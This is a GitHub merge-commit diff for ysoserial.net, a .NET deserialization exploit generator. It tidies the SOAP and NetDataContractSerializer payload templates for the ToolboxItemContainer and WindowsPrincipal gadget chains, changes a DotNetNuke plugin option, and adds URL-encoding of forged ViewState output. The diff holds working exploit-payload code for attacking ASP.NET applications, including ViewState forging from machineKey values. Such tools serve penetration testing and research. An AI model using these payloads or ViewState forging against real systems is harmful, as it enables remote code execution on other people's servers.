Merge pull request #125 from irsdl/master

url encode feature + save to file
pwntester · Aug 16, 2022 · c49410a · c49410a
2 parents 7a337f0 + 2708a11
commit c49410a
Show file tree

Hide file tree

Showing 5 changed files with 148 additions and 48 deletions.
diff --git a/ysoserial/Generators/ToolboxItemContainerGenerator.cs b/ysoserial/Generators/ToolboxItemContainerGenerator.cs
@@ -44,8 +44,7 @@ public override object Generate(string formatter, InputArgs inputArgs)
             }
             else if (formatter.ToLower().Equals("soapformatter"))
             {
-                string payload = $@"
-<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
+                string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
 <SOAP-ENV:Body>
 <a1:ToolboxItemContainer id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Drawing.Design/System.Drawing.Design%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db03f5f7f11d50a3a"">
 <TbxIC_DataObjectFormats href=""#ref-3""/>

diff --git a/ysoserial/Generators/WindowsPrincipalGenerator.cs b/ysoserial/Generators/WindowsPrincipalGenerator.cs
@@ -151,8 +151,7 @@ public override object Generate(string formatter, InputArgs inputArgs)
             else if (formatter.ToLower().Equals("netdatacontractserializer"))
             {
 
-                string payload = $@"
-<WindowsPrincipal z:Type=""System.Security.Principal.WindowsPrincipal"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" >
+                string payload = $@"<WindowsPrincipal z:Type=""System.Security.Principal.WindowsPrincipal"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" >
     <m_identity z:Type=""System.Security.Principal.WindowsIdentity"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" >
         <System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"" xmlns="""">
             {b64encoded}
@@ -207,8 +206,7 @@ public override object Generate(string formatter, InputArgs inputArgs)
             }
             else if (formatter.ToLower().Equals("soapformatter"))
             {
-                string payload = $@"
-<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC= ""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
+                string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC= ""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
     <SOAP-ENV:Body>
         <a1:WindowsPrincipal xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Principal"">
             <m_identity href = ""#ref-2"" />

diff --git a/ysoserial/Plugins/DotNetNukePlugin.cs b/ysoserial/Plugins/DotNetNukePlugin.cs
@@ -14,7 +14,7 @@ public class DotNetNukePlugin : IPlugin
         static string url = "";
         static string command = "";
         static bool minify = false;
-        static bool useSimpleType = true;
+        static bool useSimpleType = false;
 
         static OptionSet options = new OptionSet()
             {
@@ -23,7 +23,6 @@ public class DotNetNukePlugin : IPlugin
                 {"u|url=", "the url to fetch the file from in write_file mode.", v => url = v },
                 {"f|file=", "the file to read in read_file mode or the file to write to in write_file_mode.", v => path = v },
                 {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
-                {"ust|usesimpletype", "This is to remove additional info only when minifying and FormatterAssemblyStyle=Simple. Default: true", v => useSimpleType =  v != null },
             };
 
         public string Name()

diff --git a/ysoserial/Plugins/ViewStatePlugin.cs b/ysoserial/Plugins/ViewStatePlugin.cs
@@ -27,6 +27,7 @@ namespace ysoserial.Plugins
     public class ViewStatePlugin : IPlugin
     {
         static bool showExamples = false;
+        static bool showraw = false;
         static bool dryRun = false;
         static bool minify = false;
         static bool useSimpleType = true;
@@ -71,6 +72,7 @@ public class ViewStatePlugin : IPlugin
                 {"decryptionkey=", "this is the decryptionKey attribute from machineKey in the web.config file", v => decryptionKey = v},
                 {"validationalg=", "the validation algorithm can be set to SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5, 3DES, AES. Default: HMACSHA256", v => validationAlg = v},
                 {"validationkey=", "this is the validationKey attribute from machineKey in the web.config file", v => validationKey = v},
+                {"showraw", "to stop URL-encoding the result. Default: false", v => showraw = v != null },
                 {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
                 {"ust|usesimpletype", "This is to remove additional info only when minifying and FormatterAssemblyStyle=Simple. Default: true", v => useSimpleType =  v != null },
                 {"isdebug", "to show useful debugging messages!", v => isDebug = v != null },
@@ -353,7 +355,10 @@ private object generateViewStateLegacy_2_to_4(string targetPagePath, uint parsed
                 byteResult = (byte[])getterEncryptOrDecryptData.Invoke(null, new object[] { true, payload, _macKeyBytes, 0, payload.Length });
             }
 
-            return System.Convert.ToBase64String(byteResult);
+            string outputBase64 = System.Convert.ToBase64String(byteResult);
+            if (!showraw)
+                outputBase64 = Uri.EscapeDataString(outputBase64);
+            return outputBase64;
         }
 
         private object generateViewState_4dot5(string targetPagePath, string IISAppInPath, string viewStateUserKey, byte[] payload)
@@ -393,7 +398,10 @@ private object generateViewState_4dot5(string targetPagePath, string IISAppInPat
             var protectMethod = cryptoServiceClass.GetType().GetMethod("Protect");
             byte[] byteResult = (byte[])protectMethod.Invoke(cryptoServiceClass, new object[] { payload });
 
-            return System.Convert.ToBase64String(byteResult);
+            string outputBase64 = System.Convert.ToBase64String(byteResult);
+            if (!showraw)
+                outputBase64 = Uri.EscapeDataString(outputBase64);
+            return outputBase64;
         }
 
         private String simulateTemplateSourceDirectory(String strPath)